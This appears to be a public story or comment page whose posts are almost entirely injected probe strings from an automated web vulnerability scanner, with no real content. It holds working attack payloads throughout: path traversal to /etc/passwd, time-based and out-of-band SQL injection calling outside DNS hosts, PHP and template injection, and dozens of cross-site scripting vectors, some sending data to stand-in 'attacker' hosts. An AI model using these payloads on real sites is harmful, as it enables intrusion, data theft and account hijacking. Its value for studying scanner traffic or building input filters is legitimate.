lldikfoc

1


ihnbggln

/.././.././.././.././.././.././.././../etc/./passwd%00


nggxgjkk

-1' OR 3*2>(0+5+986-986) --


icgshjob

1some_inexistent_file_with_long_name.jpg


UkxSTkFmb3A=

1


Anonymous Poster

1


ihnbggln

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd


nggxgjkk

-1' OR 2+340-340-1=0+0+0+1 or '5c9dbsid'='


icgshjob

Http://testasp.vulnweb.com/t/fit.txt


ihnbggln

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd


nggxgjkk

-1' OR 3+340-340-1=0+0+0+1 or '5c9dbsid'='


nggxgjkk

-1' OR 3*2<(0+5+340-340) or '5c9dbsid'='


Anonymous Poster

1


icgshjob

http://testasp.vulnweb.com/t/fit.txt?.jpg


sebqipqh

1&n915973=v947764


Anonymous Poster

1


nggxgjkk

-1' OR 3*2>(0+5+340-340) or '5c9dbsid'='


lygiocxv

)


ihnbggln

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.


icgshjob

testasp.vulnweb.com


spgyfxqn&n975934=v925880

1


nggxgjkk

-1" OR 2+570-570-1=0+0+0+1 --


ihnbggln

file:///etc/passwd


nggxgjkk

-1" OR 3+570-570-1=0+0+0+1 --


lygiocxv

!(()&&!|*|*|


http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

1


nggxgjkk

-1" OR 3*2<(0+5+570-570) --


ihnbggln

/\../\../\../\../\../\../\../etc/passwd


1some_inexistent_file_with_long_name.jpg

1


lygiocxv

^(#$!@#$)(()))******


ihnbggln

WEB-INF/web.xml


Http://testasp.vulnweb.com/t/fit.txt

1


vltedmdo

'"()


nggxgjkk

-1" OR 3*2>(0+5+570-570) --


whhtawwl

;print(md5(acunetix_wvs_security_test));


http://testasp.vulnweb.com/t/fit.txt?.jpg

1


ihnbggln

/WEB-INF/web.xml


)

1


Anonymous Poster

1


nggxgjkk

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/


testasp.vulnweb.com

1


ihnbggln

WEB-INF\web.xml


../../../../../../../../../../etc/passwd

1


whhtawwl

';print(md5(acunetix_wvs_security_test));$a='


!(()&&!|*|*|

1


'"()

1


nggxgjkk

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/


../../../../../../../../../../../../../../../proc/version

1


whhtawwl

";print(md5(acunetix_wvs_security_test));$a="


nggxgjkk

-1; waitfor delay '0:0:6' --


^(#$!@#$)(()))******

1


diajgnme

http://testasp.vulnweb.com/t/xss.html?%00.jpg


whhtawwl

${@print(md5(acunetix_wvs_security_test))}


..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1


pwpxibfp

http://hituNeW7SJIqt.bxss.me/


apjpjnhn

1


whhtawwl

${@print(md5(acunetix_wvs_security_test))}\


nggxgjkk

-1); waitfor delay '0:0:6' --


../../../../../../../../../../etc/passwd.jpg

1


yxjeqtnu

1


apjpjnhn

m_dragons.php


http://testasp.vulnweb.com/t/xss.html?%00.jpg

1


;print(md5(acunetix_wvs_security_test));

1


nggxgjkk

1 waitfor delay '0:0:6' --


..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1


';print(md5(acunetix_wvs_security_test));$a='

1


apjpjnhn

m_dragons.php


nggxgjkk

1ZxialH0'; waitfor delay '0:0:9' --


http://hitXQMcklZnKD.bxss.me/

1


yxjeqtnu

1'"


smypfoiv

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


";print(md5(acunetix_wvs_security_test));$a="

1


nggxgjkk

-1;select pg_sleep(9); --


xiurkyrc

/www.vulnweb.com


/../..//../..//../..//../..//../..//etc/passwd.jpg

1


apjpjnhn

m_dragons.php/.


${@print(md5(acunetix_wvs_security_test))}

1


nggxgjkk

-1);select pg_sleep(9); --


yxjeqtnu

\


xiurkyrc

997566


${@print(md5(acunetix_wvs_security_test))}\

1


nggxgjkk

-1));select pg_sleep(9); --


.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1


)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1


apjpjnhn

1


nggxgjkk

KbVHMgUo';select pg_sleep(9); --


xiurkyrc

http://www.vulnweb.com


vgivwsoe

'"


yxjeqtnu

@@2fgiU


nggxgjkk

Ioa4Vms1');select pg_sleep(9); --


/etc/passwd

1


m_dragons.php

1


nmnkpqcf

1'"()&%<acx><ScRiPt >VLhg(9396)</ScRiPt>


yxjeqtnu

JyI=


nggxgjkk

QfilrbYK'));select pg_sleep(3); --


xiurkyrc

//www.vulnweb.com


%2fetc%2fpasswd

1


m_dragons.php

1


vgivwsoe

<!--


nggxgjkk

1||UTL_INADDR.get_host_address('dns.'||'sqli.013511.487-759.487.f3c47.1.bxss'||'.me')


m_dragons.php/.

1


xiurkyrc

/\www.vulnweb.com


/.././.././.././.././.././.././.././../etc/./passwd%00

1


nggxgjkk

'||UTL_INADDR.get_host_address('dns.'||'sqli.013511.487-760.487.f3c47.1.bxss'||'.me')||'


'"

1


nmnkpqcf

'"()&%<acx><ScRiPt >VLhg(9761)</ScRiPt>


nggxgjkk

1;copy (select '') to program 'nslookup dns.sqli.\013511.487-761.487.f3c47.\1.bxss.me'


../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1


/www.vulnweb.com

1


yxjeqtnu

1


nggxgjkk

1';copy (select '') to program 'nslookup dns.sqli.\013511.487-762.487.f3c47.\1.bxss.me


966176

1


../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1


nggxgjkk

313'


http://www.vulnweb.com

1


<!--

1


nmnkpqcf

19383710


Anonymous Poster

1


nggxgjkk

1


1'"

1


//www.vulnweb.com

1


nggxgjkk

1


nmnkpqcf

acu7042<s1﹥s2ʺs3ʹuca7042


invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1


/\www.vulnweb.com

1


-1 OR 2+355-355-1=0+0+0+1 --

1


\

1


file:///etc/passwd

1


Anonymous Poster

1


nmnkpqcf

{{9999642*9999351}}


/\../\../\../\../\../\../\../etc/passwd

1


nmnkpqcf

1<ScRiPt >VLhg(9821)</ScRiPt>


-1 OR 3+355-355-1=0+0+0+1 --

1


@@4xMDC

1


nmnkpqcf

1<WL80JD>PIK9Q[!+!]</WL80JD>


WEB-INF/web.xml

1


nmnkpqcf

1<script>VLhg(9550)</script>


/WEB-INF/web.xml

1


-1 OR 3*2<(0+5+355-355) --

1


JyI=

1


nmnkpqcf

1<ScR<ScRiPt>IpT>VLhg(9351)</sCr<ScRiPt>IpT>


nmnkpqcf

1<ScRiPt >VLhg(9736)</ScRiPt>


Anonymous Poster

1


-1 OR 3*2>(0+5+355-355) --

1


WEB-INF\web.xml

1


nmnkpqcf

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9287></ScRiPt>


nmnkpqcf

1<ScRiPt >VLhg(9640)</ScRiPt>


Anonymous Poster

1


-1 OR 2+129-129-1=0+0+0+1

1


nmnkpqcf

1<video><source onerror="javascript:VLhg(9764)">


-1 OR 3+129-129-1=0+0+0+1

1


nmnkpqcf

1<isindex type=image src=1 onerror=VLhg(9253)>


nmnkpqcf

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9602'>


-1 OR 3*2<(0+5+129-129)

1


nmnkpqcf

1<body onload=VLhg(9990)>


nmnkpqcf

1<img src=//testasp.vulnweb.com/t/dot.gif onload=VLhg(9606)>


-1 OR 3*2>(0+5+129-129)

1


nmnkpqcf

1<img src=xyz OnErRor=VLhg(9469)>


-1' OR 2+625-625-1=0+0+0+1 --

1


nmnkpqcf

1<img/src=">" onerror=alert(9590)>


-1' OR 3+625-625-1=0+0+0+1 --

1


nmnkpqcf

%31%3C%53%63%52%69%50%74%20%3E%56%4C%68%67%289588%29%3C%2F%73%43%72%69%70%54%3E


-1' OR 3*2<(0+5+625-625) --

1


-1' OR 3*2>(0+5+625-625) --

1


nmnkpqcf

1\u003CScRiPt\VLhg(9335)\u003C/sCripT\u003E


-1' OR 2+886-886-1=0+0+0+1 or 'LGdlxPPQ'='

1


nmnkpqcf

1&lt;ScRiPt&gt;VLhg(9017)&lt;/sCripT&gt;


-1' OR 3+886-886-1=0+0+0+1 or 'LGdlxPPQ'='

1


nmnkpqcf

1<input autofocus onfocus=VLhg(9333)>


-1' OR 3*2<(0+5+886-886) or 'LGdlxPPQ'='

1


nmnkpqcf

<a HrEF=http://www.vulnweb.com></a>


-1' OR 3*2>(0+5+886-886) or 'LGdlxPPQ'='

1


nmnkpqcf

<a HrEF=jaVaScRiPT:>


nmnkpqcf

[url=http://www.vulnweb.com][/url]


-1" OR 2+43-43-1=0+0+0+1 --

1


nmnkpqcf

1<img<!-- --> src=x onerror=alert(9254);//><!-- -->


-1" OR 3+43-43-1=0+0+0+1 --

1


nmnkpqcf

1}body{acu:Expre/**/SSion(VLhg(9989))}


nmnkpqcf

1<% contenteditable onresize=VLhg(9218)>


-1" OR 3*2<(0+5+43-43) --

1


nmnkpqcf

1jkhIJ <ScRiPt >VLhg(9982)</ScRiPt>


-1" OR 3*2>(0+5+43-43) --

1


nmnkpqcf

1<WQNBLT>AEZAL[!+!]</WQNBLT>


if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1


nmnkpqcf

1<ifRAme sRc=9285.com></IfRamE>


(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1


nmnkpqcf

1<bTzRoj x=9804>


1 waitfor delay '0:0:9' --

1


nmnkpqcf

1<img sRc='http://attacker-9290/log.php?


bv8nACK6'; waitfor delay '0:0:9' --

1


nmnkpqcf

1<Nl0bHw<


JKSHZ0KI';select pg_sleep(9); --

1


nmnkpqcf'"()&%<acx><ScRiPt >VLhg(9778)</ScRiPt>

1


'"()&%<acx><ScRiPt >VLhg(9476)</ScRiPt>

1


KYJS4WZX');select pg_sleep(3); --

1


nmnkpqcf9953701

1


VjGYqzFU'));select pg_sleep(3); --

1


acu4721<s1﹥s2ʺs3ʹuca4721

1


'||UTL_INADDR.get_host_address('dns.'||'sqli.013511.487-789.487.f3c47.1.bxss'||'.me')||'

1


Anonymous Poster

1


nggxgjkk';copy (select '') to program 'nslookup dns.sqli.\013511.487-792.487.f3c47.\1.bxss.me

1


785'

1


Anonymous Poster

1


{{9999656*9999863}}

1


nmnkpqcf<ScRiPt >VLhg(9647)</ScRiPt>

1


nmnkpqcf<WI6SVZ>TXAYD[!+!]</WI6SVZ>

1


nmnkpqcf<script>VLhg(9127)</script>

1


nmnkpqcf<ScR<ScRiPt>IpT>VLhg(9055)</sCr<ScRiPt>IpT>

1


nmnkpqcf<ScRiPt >VLhg(9204)</ScRiPt>

1


nmnkpqcf<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9712></ScRiPt>

1


nmnkpqcf<ScRiPt >VLhg(9652)</ScRiPt>

1


nmnkpqcf<video><source onerror="javascript:VLhg(9729)">

1


Anonymous Poster

1


nmnkpqcf<isindex type=image src=1 onerror=VLhg(9306)>

1


nmnkpqcf<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9495'>

1


nmnkpqcf<body onload=VLhg(9645)>

1


nmnkpqcf<img src=//testasp.vulnweb.com/t/dot.gif onload=VLhg(9789)>

1


nmnkpqcf<img src=xyz OnErRor=VLhg(9844)>

1


nmnkpqcf<img/src=">" onerror=alert(9877)>

1


%6E%6D%6E%6B%70%71%63%66%3C%53%63%52%69%50%74%20%3E%56%4C%68%67%289005%29%3C%2F%73%43%72%69%70%54%3E

1


nmnkpqcf\u003CScRiPt\VLhg(9949)\u003C/sCripT\u003E

1


nmnkpqcf&lt;ScRiPt&gt;VLhg(9233)&lt;/sCripT&gt;

1


Anonymous Poster

1


nmnkpqcf<input autofocus onfocus=VLhg(9909)>

1


<a HrEF=http://www.vulnweb.com></a>

1


<a HrEF=jaVaScRiPT:>

1


[url=http://www.vulnweb.com][/url]

1


nmnkpqcf<img<!-- --> src=x onerror=alert(9760);//><!-- -->

1


nmnkpqcf}body{acu:Expre/**/SSion(VLhg(9558))}

1


nmnkpqcf<% contenteditable onresize=VLhg(9761)>

1


nmnkpqcfu6hMG <ScRiPt >VLhg(9693)</ScRiPt>

1


nmnkpqcf<WMMRTH>ZB4XQ[!+!]</WMMRTH>

1


nmnkpqcf<ifRAme sRc=9041.com></IfRamE>

1


nmnkpqcf<iHjtqj x=9809>

1


nmnkpqcf<img sRc='http://attacker-9123/log.php?

1


nmnkpqcf<uiYed5<

1


vbncqtjv

1acuHo2eLcJA0b


1acuA8Cx2UQoh0

1


qysqdgmp

1'"()&%<acx><ScRiPt >VLtP(9834)</ScRiPt>


qysqdgmp

'"()&%<acx><ScRiPt >VLtP(9782)</ScRiPt>


qysqdgmp

19412978


qysqdgmp

acu1063<s1﹥s2ʺs3ʹuca1063


qysqdgmp

{{9999245*9999483}}


qysqdgmp

1<ScRiPt >VLtP(9796)</ScRiPt>


qysqdgmp

1<WK6KF4>60KUX[!+!]</WK6KF4>


qysqdgmp

1<script>VLtP(9850)</script>


qysqdgmp

1<ScR<ScRiPt>IpT>VLtP(9408)</sCr<ScRiPt>IpT>


qysqdgmp

1<ScRiPt >VLtP(9702)</ScRiPt>


qysqdgmp

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9637></ScRiPt>


qysqdgmp

1<ScRiPt >VLtP(9603)</ScRiPt>


qysqdgmp

1<video><source onerror="javascript:VLtP(9907)">


qysqdgmp

1<isindex type=image src=1 onerror=VLtP(9761)>


qysqdgmp

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9726'>


qysqdgmp

1<body onload=VLtP(9736)>


qysqdgmp

1<img src=//testasp.vulnweb.com/t/dot.gif onload=VLtP(9891)>


qysqdgmp

1<img src=xyz OnErRor=VLtP(9368)>


qysqdgmp

1<img/src=">" onerror=alert(9440)>


qysqdgmp

%31%3C%53%63%52%69%50%74%20%3E%56%4C%74%50%289327%29%3C%2F%73%43%72%69%70%54%3E


qysqdgmp

1\u003CScRiPt\VLtP(9142)\u003C/sCripT\u003E


qysqdgmp

1&lt;ScRiPt&gt;VLtP(9991)&lt;/sCripT&gt;


qysqdgmp

1<input autofocus onfocus=VLtP(9541)>


qysqdgmp

<a HrEF=http://www.vulnweb.com></a>


qysqdgmp

<a HrEF=jaVaScRiPT:>


qysqdgmp

[url=http://www.vulnweb.com][/url]


qysqdgmp

1<img<!-- --> src=x onerror=alert(9800);//><!-- -->


qysqdgmp

1}body{acu:Expre/**/SSion(VLtP(9714))}


qysqdgmp

1<% contenteditable onresize=VLtP(9007)>


qysqdgmp

1dHRyT <ScRiPt >VLtP(9219)</ScRiPt>


qysqdgmp

1<WNVCBO>ZLBRH[!+!]</WNVCBO>


qysqdgmp

1<ifRAme sRc=9276.com></IfRamE>


qysqdgmp

1<cq0avZ x=9409>


qysqdgmp

1<img sRc='http://attacker-9849/log.php?


qysqdgmp

1<pJkwxR<


ltkjdhge'"()&%<acx><ScRiPt >VLtP(9962)</ScRiPt>

1


'"()&%<acx><ScRiPt >VLtP(9133)</ScRiPt>

1


ltkjdhge9311537

1


acu3182<s1﹥s2ʺs3ʹuca3182

1


Anonymous Poster

1


Anonymous Poster

1


{{10000234*10000291}}

1


ltkjdhge<ScRiPt >VLtP(9435)</ScRiPt>

1


ltkjdhge<W8BBLB>XDRCP[!+!]</W8BBLB>

1


ltkjdhge<script>VLtP(9630)</script>

1


ltkjdhge<ScR<ScRiPt>IpT>VLtP(9406)</sCr<ScRiPt>IpT>

1


ltkjdhge<ScRiPt >VLtP(9542)</ScRiPt>

1


ltkjdhge<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9839></ScRiPt>

1


ltkjdhge<ScRiPt >VLtP(9462)</ScRiPt>

1


ltkjdhge<video><source onerror="javascript:VLtP(9629)">

1


Anonymous Poster

1


ltkjdhge<isindex type=image src=1 onerror=VLtP(9431)>

1


ltkjdhge<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9668'>

1


ltkjdhge<body onload=VLtP(9800)>

1


ltkjdhge<img src=//testasp.vulnweb.com/t/dot.gif onload=VLtP(9025)>

1


ltkjdhge<img src=xyz OnErRor=VLtP(9304)>

1


ltkjdhge<img/src=">" onerror=alert(9471)>

1


%6C%74%6B%6A%64%68%67%65%3C%53%63%52%69%50%74%20%3E%56%4C%74%50%289383%29%3C%2F%73%43%72%69%70%54%3E

1


ltkjdhge\u003CScRiPt\VLtP(9555)\u003C/sCripT\u003E

1


ltkjdhge&lt;ScRiPt&gt;VLtP(9901)&lt;/sCripT&gt;

1


Anonymous Poster

1


ltkjdhge<input autofocus onfocus=VLtP(9366)>

1


<a HrEF=http://www.vulnweb.com></a>

1


<a HrEF=jaVaScRiPT:>

1


[url=http://www.vulnweb.com][/url]

1


ltkjdhge<img<!-- --> src=x onerror=alert(9222);//><!-- -->

1


ltkjdhge}body{acu:Expre/**/SSion(VLtP(9940))}

1


ltkjdhge<% contenteditable onresize=VLtP(9937)>

1


ltkjdhgeMYlFh <ScRiPt >VLtP(9070)</ScRiPt>

1


ltkjdhge<WT2JK0>TF2X9[!+!]</WT2JK0>

1


ltkjdhge<ifRAme sRc=9564.com></IfRamE>

1


ltkjdhge<rKbcGr x=9012>

1


ltkjdhge<img sRc='http://attacker-9856/log.php?

1


ltkjdhge<IcOIQE<

1



Post a story: